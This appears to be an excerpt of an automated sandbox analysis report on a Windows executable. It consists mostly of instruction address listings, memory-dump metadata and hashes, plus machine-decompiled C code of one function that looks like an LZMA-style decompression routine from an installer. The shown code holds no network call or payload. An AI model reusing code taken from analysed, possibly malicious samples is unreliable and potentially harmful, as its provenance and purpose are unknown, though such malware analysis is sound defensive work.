                                                                                                            0x0040690a
                                                                                                            0x0040690d
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fb5
                                                                                                            0x00405fbe
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x00405fc4
                                                                                                            0x00000000
                                                                                                            0x00405fcb
                                                                                                            0x00405fcf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fd5
                                                                                                            0x00405fd8
                                                                                                            0x00405fdb
                                                                                                            0x00405fde
                                                                                                            0x00405fe2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fe8
                                                                                                            0x00405fe8
                                                                                                            0x00405feb
                                                                                                            0x00405fed
                                                                                                            0x00405fee
                                                                                                            0x00405ff1
                                                                                                            0x00405ff3
                                                                                                            0x00405ff4
                                                                                                            0x00405ff6
                                                                                                            0x00405ff9
                                                                                                            0x00405ffe
                                                                                                            0x00406003
                                                                                                            0x0040600c
                                                                                                            0x0040601f
                                                                                                            0x00406022
                                                                                                            0x0040602e
                                                                                                            0x00406056
                                                                                                            0x00406058
                                                                                                            0x00406066
                                                                                                            0x00406066
                                                                                                            0x0040606a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x0040605a
                                                                                                            0x0040605d
                                                                                                            0x0040605e
                                                                                                            0x0040605e
                                                                                                            0x00000000
                                                                                                            0x0040605a
                                                                                                            0x00406030
                                                                                                            0x00406034
                                                                                                            0x00406039
                                                                                                            0x00406039
                                                                                                            0x00406042
                                                                                                            0x0040604a
                                                                                                            0x0040604d
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406053
                                                                                                            0x00000000
                                                                                                            0x00406070
                                                                                                            0x00406070
                                                                                                            0x00406074
                                                                                                            0x00406920
                                                                                                            0x00406920
                                                                                                            0x00000000
                                                                                                            0x00406920
                                                                                                            0x0040607a
                                                                                                            0x0040607d
                                                                                                            0x0040608d
                                                                                                            0x00406090
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406093
                                                                                                            0x00406096
                                                                                                            0x0040609a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040609c
                                                                                                            0x0040609c
                                                                                                            0x004060a2
                                                                                                            0x004060cc
                                                                                                            0x004060d2
                                                                                                            0x004060d9
                                                                                                            0x00000000
                                                                                                            0x004060d9
                                                                                                            0x004060a4
                                                                                                            0x004060a8
                                                                                                            0x004060ab
                                                                                                            0x004060b0
                                                                                                            0x004060b0
                                                                                                            0x004060bb
                                                                                                            0x004060c3
                                                                                                            0x004060c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040610b
                                                                                                            0x00406111
                                                                                                            0x00406114
                                                                                                            0x00406121
                                                                                                            0x00406129
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004060e0
                                                                                                            0x004060e0
                                                                                                            0x004060e4
                                                                                                            0x0040692f
                                                                                                            0x0040692f
                                                                                                            0x00000000
                                                                                                            0x0040692f
                                                                                                            0x004060ea
                                                                                                            0x004060f0
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fb
                                                                                                            0x004060fe
                                                                                                            0x00406101
                                                                                                            0x00406104
                                                                                                            0x00406109
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067a0
                                                                                                            0x004067a0
                                                                                                            0x004067a6
                                                                                                            0x004067ac
                                                                                                            0x004067b2
                                                                                                            0x004067cc
                                                                                                            0x004067cf
                                                                                                            0x004067d5
                                                                                                            0x004067e0
                                                                                                            0x004067e0
                                                                                                            0x004067e2
                                                                                                            0x004067b4
                                                                                                            0x004067b4
                                                                                                            0x004067c3
                                                                                                            0x004067c7
                                                                                                            0x004067c7
                                                                                                            0x004067ec
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004067ee
                                                                                                            0x004067f2
                                                                                                            0x004069a1
                                                                                                            0x004069a1
                                                                                                            0x00000000
                                                                                                            0x004069a1
                                                                                                            0x004067f8
                                                                                                            0x004067fe
                                                                                                            0x00406805
                                                                                                            0x0040680d
                                                                                                            0x00406810
                                                                                                            0x00406813
                                                                                                            0x00406813
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406131
                                                                                                            0x00406131
                                                                                                            0x00406133
                                                                                                            0x00406136
                                                                                                            0x004061a7
                                                                                                            0x004061a7
                                                                                                            0x004061aa
                                                                                                            0x004061ad
                                                                                                            0x004061b4
                                                                                                            0x004061be
                                                                                                            0x00000000
                                                                                                            0x004061be
                                                                                                            0x00406138
                                                                                                            0x00406138
                                                                                                            0x0040613c
                                                                                                            0x0040613f
                                                                                                            0x00406141
                                                                                                            0x00406144
                                                                                                            0x00406147
                                                                                                            0x00406149
                                                                                                            0x0040614c
                                                                                                            0x0040614e
                                                                                                            0x00406153
                                                                                                            0x00406156
                                                                                                            0x00406159
                                                                                                            0x0040615d
                                                                                                            0x00406164
                                                                                                            0x00406167
                                                                                                            0x0040616e
                                                                                                            0x00406172
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x0040617a
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406174
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x00406169
                                                                                                            0x0040617e
                                                                                                            0x00406181
                                                                                                            0x0040619f
                                                                                                            0x0040619f
                                                                                                            0x004061a1
                                                                                                            0x00000000
                                                                                                            0x00406183
                                                                                                            0x00406183
                                                                                                            0x00406183
                                                                                                            0x00406186
                                                                                                            0x00406189
                                                                                                            0x0040618c
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x0040618e
                                                                                                            0x00406191
                                                                                                            0x00406194
                                                                                                            0x00406196
                                                                                                            0x00406197
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x0040619a
                                                                                                            0x00000000
                                                                                                            0x004063d0
                                                                                                            0x004063d0
                                                                                                            0x004063d4
                                                                                                            0x004063f2
                                                                                                            0x004063f2
                                                                                                            0x004063f5
                                                                                                            0x004063fc
                                                                                                            0x004063ff
                                                                                                            0x00406402
                                                                                                            0x00406405
                                                                                                            0x00406408
                                                                                                            0x0040640b
                                                                                                            0x0040640d
                                                                                                            0x00406414
                                                                                                            0x00406415
                                                                                                            0x00406417
                                                                                                            0x0040641a
                                                                                                            0x0040641d
                                                                                                            0x00406420
                                                                                                            0x00406420
                                                                                                            0x00406425
                                                                                                            0x00000000
                                                                                                            0x00406425
                                                                                                            0x004063d6
                                                                                                            0x004063d6
                                                                                                            0x004063d9
                                                                                                            0x004063dc
                                                                                                            0x004063e6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040643a
                                                                                                            0x0040643a
                                                                                                            0x0040643e
                                                                                                            0x00406461
                                                                                                            0x00406464
                                                                                                            0x00406467
                                                                                                            0x00406471
                                                                                                            0x00406440
                                                                                                            0x00406440
                                                                                                            0x00406443
                                                                                                            0x00406446
                                                                                                            0x00406449
                                                                                                            0x00406456
                                                                                                            0x00406459
                                                                                                            0x00406459
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040647d
                                                                                                            0x0040647d
                                                                                                            0x00406481
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406487
                                                                                                            0x00406487
                                                                                                            0x0040648b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406491
                                                                                                            0x00406491
                                                                                                            0x00406493
                                                                                                            0x00406497
                                                                                                            0x00406497
                                                                                                            0x0040649a
                                                                                                            0x0040649e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064ee
                                                                                                            0x004064ee
                                                                                                            0x004064f2
                                                                                                            0x004064f9
                                                                                                            0x004064f9
                                                                                                            0x004064fc
                                                                                                            0x004064ff
                                                                                                            0x00406509
                                                                                                            0x00000000
                                                                                                            0x00406509
                                                                                                            0x004064f4
                                                                                                            0x004064f4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406515
                                                                                                            0x00406515
                                                                                                            0x00406519
                                                                                                            0x00406520
                                                                                                            0x00406523
                                                                                                            0x00406526
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x0040651b
                                                                                                            0x00406529
                                                                                                            0x0040652c
                                                                                                            0x0040652f
                                                                                                            0x0040652f
                                                                                                            0x00406532
                                                                                                            0x00406535
                                                                                                            0x00406538
                                                                                                            0x00406538
                                                                                                            0x0040653b
                                                                                                            0x00406542
                                                                                                            0x00406547
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004065d5
                                                                                                            0x004065d5
                                                                                                            0x004065d9
                                                                                                            0x00406977
                                                                                                            0x00406977
                                                                                                            0x00000000
                                                                                                            0x00406977
                                                                                                            0x004065df
                                                                                                            0x004065df
                                                                                                            0x004065e2
                                                                                                            0x004065e5
                                                                                                            0x004065e9
                                                                                                            0x004065ec
                                                                                                            0x004065f2
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f4
                                                                                                            0x004065f7
                                                                                                            0x004065fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061ca
                                                                                                            0x004061ca
                                                                                                            0x004061ce
                                                                                                            0x0040693b
                                                                                                            0x0040693b
                                                                                                            0x00000000
                                                                                                            0x0040693b
                                                                                                            0x004061d4
                                                                                                            0x004061d4
                                                                                                            0x004061d7
                                                                                                            0x004061da
                                                                                                            0x004061de
                                                                                                            0x004061e1
                                                                                                            0x004061e7
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061e9
                                                                                                            0x004061ec
                                                                                                            0x004061ef
                                                                                                            0x004061ef
                                                                                                            0x004061f2
                                                                                                            0x004061f5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004061fb
                                                                                                            0x004061fb
                                                                                                            0x00406201
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406207
                                                                                                            0x00406207
                                                                                                            0x0040620b
                                                                                                            0x0040620e
                                                                                                            0x00406211
                                                                                                            0x00406214
                                                                                                            0x00406217
                                                                                                            0x00406218
                                                                                                            0x0040621b
                                                                                                            0x0040621d
                                                                                                            0x00406223
                                                                                                            0x00406226
                                                                                                            0x00406229
                                                                                                            0x0040622c
                                                                                                            0x0040622f
                                                                                                            0x00406232
                                                                                                            0x00406235
                                                                                                            0x00406251
                                                                                                            0x00406254
                                                                                                            0x00406257
                                                                                                            0x0040625a
                                                                                                            0x00406261
                                                                                                            0x00406265
                                                                                                            0x00406267
                                                                                                            0x0040626b
                                                                                                            0x00406237
                                                                                                            0x00406237
                                                                                                            0x0040623b
                                                                                                            0x00406243
                                                                                                            0x00406248
                                                                                                            0x0040624a
                                                                                                            0x0040624c
                                                                                                            0x0040624c
                                                                                                            0x0040626e
                                                                                                            0x00406275
                                                                                                            0x00406278
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x0040627e
                                                                                                            0x00000000
                                                                                                            0x00406283
                                                                                                            0x00406283
                                                                                                            0x00406287
                                                                                                            0x00406947
                                                                                                            0x00406947
                                                                                                            0x00000000
                                                                                                            0x00406947
                                                                                                            0x0040628d
                                                                                                            0x0040628d
                                                                                                            0x00406290
                                                                                                            0x00406293
                                                                                                            0x00406297
                                                                                                            0x0040629a
                                                                                                            0x004062a0
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a2
                                                                                                            0x004062a5
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062a8
                                                                                                            0x004062ae
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004062b0
                                                                                                            0x004062b0
                                                                                                            0x004062b3
                                                                                                            0x004062b6
                                                                                                            0x004062b9
                                                                                                            0x004062bc
                                                                                                            0x004062bf
                                                                                                            0x004062c2
                                                                                                            0x004062c5
                                                                                                            0x004062c8
                                                                                                            0x004062cb
                                                                                                            0x004062ce
                                                                                                            0x004062e6
                                                                                                            0x004062e9
                                                                                                            0x004062ec
                                                                                                            0x004062ef
                                                                                                            0x004062ef
                                                                                                            0x004062f2
                                                                                                            0x004062f6
                                                                                                            0x004062f8
                                                                                                            0x004062d0
                                                                                                            0x004062d0
                                                                                                            0x004062d8
                                                                                                            0x004062dd
                                                                                                            0x004062df
                                                                                                            0x004062e1
                                                                                                            0x004062e1
                                                                                                            0x004062fb
                                                                                                            0x00406302
                                                                                                            0x00406305
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00406307
                                                                                                            0x00000000
                                                                                                            0x00406307
                                                                                                            0x00406305
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x0040630c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406347
                                                                                                            0x00406347
                                                                                                            0x0040634b
                                                                                                            0x00406953
                                                                                                            0x00406953
                                                                                                            0x00000000
                                                                                                            0x00406953
                                                                                                            0x00406351
                                                                                                            0x00406351
                                                                                                            0x00406354
                                                                                                            0x00406357
                                                                                                            0x0040635b
                                                                                                            0x0040635e
                                                                                                            0x00406364
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406366
                                                                                                            0x00406369
                                                                                                            0x0040636c
                                                                                                            0x0040636c
                                                                                                            0x00406372
                                                                                                            0x00406310
                                                                                                            0x00406310
                                                                                                            0x00406313
                                                                                                            0x00000000
                                                                                                            0x00406313
                                                                                                            0x00406374
                                                                                                            0x00406374
                                                                                                            0x00406377
                                                                                                            0x0040637a
                                                                                                            0x0040637d
                                                                                                            0x00406380
                                                                                                            0x00406383
                                                                                                            0x00406386
                                                                                                            0x00406389
                                                                                                            0x0040638c
                                                                                                            0x0040638f
                                                                                                            0x00406392
                                                                                                            0x004063aa
                                                                                                            0x004063ad
                                                                                                            0x004063b0
                                                                                                            0x004063b3
                                                                                                            0x004063b3
                                                                                                            0x004063b6
                                                                                                            0x004063ba
                                                                                                            0x004063bc
                                                                                                            0x00406394
                                                                                                            0x00406394
                                                                                                            0x0040639c
                                                                                                            0x004063a1
                                                                                                            0x004063a3
                                                                                                            0x004063a5
                                                                                                            0x004063a5
                                                                                                            0x004063bf
                                                                                                            0x004063c6
                                                                                                            0x004063c9
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x004063cb
                                                                                                            0x00000000
                                                                                                            0x00406658
                                                                                                            0x00406658
                                                                                                            0x0040665c
                                                                                                            0x00406983
                                                                                                            0x00406983
                                                                                                            0x00000000
                                                                                                            0x00406983
                                                                                                            0x00406662
                                                                                                            0x00406662
                                                                                                            0x00406665
                                                                                                            0x00406668
                                                                                                            0x0040666c
                                                                                                            0x0040666f
                                                                                                            0x00406675
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x00406677
                                                                                                            0x0040667a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406428
                                                                                                            0x00406428
                                                                                                            0x0040642b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406767
                                                                                                            0x00406767
                                                                                                            0x0040676b
                                                                                                            0x0040678d
                                                                                                            0x0040678d
                                                                                                            0x00406790
                                                                                                            0x0040679a
                                                                                                            0x0040679d
                                                                                                            0x0040679d
                                                                                                            0x00000000
                                                                                                            0x0040679d
                                                                                                            0x0040676d
                                                                                                            0x0040676d
                                                                                                            0x00406770
                                                                                                            0x00406774
                                                                                                            0x00406777
                                                                                                            0x00406777
                                                                                                            0x0040677a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406824
                                                                                                            0x00406824
                                                                                                            0x00406828
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x00406846
                                                                                                            0x0040684d
                                                                                                            0x00406854
                                                                                                            0x0040685b
                                                                                                            0x0040685b
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00000000
                                                                                                            0x0040686f
                                                                                                            0x0040682a
                                                                                                            0x0040682a
                                                                                                            0x0040682d
                                                                                                            0x00406830
                                                                                                            0x00406833
                                                                                                            0x0040683a
                                                                                                            0x0040677e
                                                                                                            0x0040677e
                                                                                                            0x00406781
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406915
                                                                                                            0x00406915
                                                                                                            0x00406918
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00406819
                                                                                                            0x00000000
                                                                                                            0x0040681f
                                                                                                            0x00000000
                                                                                                            0x0040654f
                                                                                                            0x0040654f
                                                                                                            0x00406551
                                                                                                            0x00406558
                                                                                                            0x00406559
                                                                                                            0x0040655b
                                                                                                            0x0040655e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406862
                                                                                                            0x00406862
                                                                                                            0x00406865
                                                                                                            0x0040686c
                                                                                                            0x00000000
                                                                                                            0x0040686f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406594
                                                                                                            0x00406594
                                                                                                            0x00406597
                                                                                                            0x004065cd
                                                                                                            0x004065cd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x004066fd
                                                                                                            0x00406700
                                                                                                            0x00406700
                                                                                                            0x00406703
                                                                                                            0x00406705
                                                                                                            0x0040698f
                                                                                                            0x0040698f
                                                                                                            0x00000000
                                                                                                            0x0040698f
                                                                                                            0x0040670b
                                                                                                            0x0040670b
                                                                                                            0x0040670e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406714
                                                                                                            0x00406714
                                                                                                            0x00406718
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x0040671b
                                                                                                            0x00000000
                                                                                                            0x0040671b
                                                                                                            0x00406599
                                                                                                            0x00406599
                                                                                                            0x0040659b
                                                                                                            0x0040659d
                                                                                                            0x0040659f
                                                                                                            0x004065a2
                                                                                                            0x004065a3
                                                                                                            0x004065a5
                                                                                                            0x004065a7
                                                                                                            0x004065aa
                                                                                                            0x004065ad
                                                                                                            0x004065c3
                                                                                                            0x004065c3
                                                                                                            0x004065c8
                                                                                                            0x00406600
                                                                                                            0x00406600
                                                                                                            0x00406604
                                                                                                            0x0040662d
                                                                                                            0x00406630
                                                                                                            0x00406632
                                                                                                            0x00406639
                                                                                                            0x0040663c
                                                                                                            0x0040663f
                                                                                                            0x0040663f
                                                                                                            0x00406644
                                                                                                            0x00406644
                                                                                                            0x00406646
                                                                                                            0x00406649
                                                                                                            0x00406650
                                                                                                            0x00406653
                                                                                                            0x00406680
                                                                                                            0x00406680
                                                                                                            0x00406683
                                                                                                            0x00406686
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x004066fa
                                                                                                            0x00000000
                                                                                                            0x004066fa
                                                                                                            0x00406688
                                                                                                            0x00406688
                                                                                                            0x0040668e
                                                                                                            0x00406691
                                                                                                            0x00406694
                                                                                                            0x00406697
                                                                                                            0x0040669a
                                                                                                            0x0040669d
                                                                                                            0x004066a0
                                                                                                            0x004066a3
                                                                                                            0x004066a6
                                                                                                            0x004066a9
                                                                                                            0x004066c2
                                                                                                            0x004066c4
                                                                                                            0x004066c7
                                                                                                            0x004066c8
                                                                                                            0x004066cb
                                                                                                            0x004066cd
                                                                                                            0x004066d0
                                                                                                            0x004066d2
                                                                                                            0x004066d4
                                                                                                            0x004066d7
                                                                                                            0x004066d9
                                                                                                            0x004066dc
                                                                                                            0x004066e0
                                                                                                            0x004066e2
                                                                                                            0x004066e2
                                                                                                            0x004066e3
                                                                                                            0x004066e6
                                                                                                            0x004066e9
                                                                                                            0x004066ab
                                                                                                            0x004066ab
                                                                                                            0x004066b3
                                                                                                            0x004066b8
                                                                                                            0x004066ba
                                                                                                            0x004066bd
                                                                                                            0x004066bd
                                                                                                            0x004066ec
                                                                                                            0x004066f3
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x0040667d
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f5
                                                                                                            0x00000000
                                                                                                            0x004066f5
                                                                                                            0x004066f3
                                                                                                            0x00406606
                                                                                                            0x00406606
                                                                                                            0x00406609
                                                                                                            0x0040660b
                                                                                                            0x0040660e
                                                                                                            0x00406611
                                                                                                            0x00406614
                                                                                                            0x00406616
                                                                                                            0x00406619
                                                                                                            0x0040661c
                                                                                                            0x0040661c
                                                                                                            0x0040661f
                                                                                                            0x0040661f
                                                                                                            0x00406622
                                                                                                            0x00406629
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x004065fd
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x0040662b
                                                                                                            0x00000000
                                                                                                            0x0040662b
                                                                                                            0x00406629
                                                                                                            0x004065af
                                                                                                            0x004065af
                                                                                                            0x004065b2
                                                                                                            0x004065b4
                                                                                                            0x004065b7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406316
                                                                                                            0x00406316
                                                                                                            0x0040631a
                                                                                                            0x0040695f
                                                                                                            0x0040695f
                                                                                                            0x00000000
                                                                                                            0x0040695f
                                                                                                            0x00406320
                                                                                                            0x00406320
                                                                                                            0x00406323
                                                                                                            0x00406326
                                                                                                            0x00406329
                                                                                                            0x0040632c
                                                                                                            0x0040632f
                                                                                                            0x00406332
                                                                                                            0x00406334
                                                                                                            0x00406337
                                                                                                            0x0040633a
                                                                                                            0x0040633d
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x0040633f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004064a1
                                                                                                            0x004064a1
                                                                                                            0x004064a5
                                                                                                            0x0040696b
                                                                                                            0x0040696b
                                                                                                            0x00000000
                                                                                                            0x0040696b
                                                                                                            0x004064ab
                                                                                                            0x004064ab
                                                                                                            0x004064ae
                                                                                                            0x004064b1
                                                                                                            0x004064b4
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b6
                                                                                                            0x004064b9
                                                                                                            0x004064bc
                                                                                                            0x004064bf
                                                                                                            0x004064c2
                                                                                                            0x004064c5
                                                                                                            0x004064c8
                                                                                                            0x004064c9
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064cb
                                                                                                            0x004064ce
                                                                                                            0x004064d1
                                                                                                            0x004064d4
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064d7
                                                                                                            0x004064da
                                                                                                            0x004064dc
                                                                                                            0x004064dc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x0040671e
                                                                                                            0x00406722
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00406728
                                                                                                            0x00406728
                                                                                                            0x0040672b
                                                                                                            0x0040672e
                                                                                                            0x00406731
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406733
                                                                                                            0x00406736
                                                                                                            0x00406739
                                                                                                            0x0040673c
                                                                                                            0x0040673f
                                                                                                            0x00406742
                                                                                                            0x00406745
                                                                                                            0x00406746
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x00406748
                                                                                                            0x0040674b
                                                                                                            0x0040674e
                                                                                                            0x00406751
                                                                                                            0x00406754
                                                                                                            0x00406757
                                                                                                            0x0040675b
                                                                                                            0x0040675d
                                                                                                            0x00406760
                                                                                                            0x00000000
                                                                                                            0x00406762
                                                                                                            0x00406762
                                                                                                            0x004064df
                                                                                                            0x004064df
                                                                                                            0x00000000
                                                                                                            0x004064df
                                                                                                            0x00406760
                                                                                                            0x00406995
                                                                                                            0x00406995
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405fc4
                                                                                                            0x004069cc
                                                                                                            0x004069cc
                                                                                                            0x00000000
                                                                                                            0x004069cc
                                                                                                            0x00406819
                                                                                                            0x00406899
                                                                                                            0x00406862

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.341219555.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.341191380.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341243931.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341257796.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341352308.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341409898.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000000.00000002.341500620.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                            • Instruction ID: 319d18918fa2cc3741333e20ed782d5c303dd2f769888eebbc994f2124d7c2e6
                                                                                                            • Opcode Fuzzy Hash: b47bfdafb4299acf6df14b1a265fb959f908a42d38d0bc6d60d6342fbb02c28f
                                                                                                            • Instruction Fuzzy Hash: 29A15171E00229CBDF28CFA8C8547ADBBB1FF44305F15812AD856BB281D7789A96DF44
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00406767, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E00406767() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
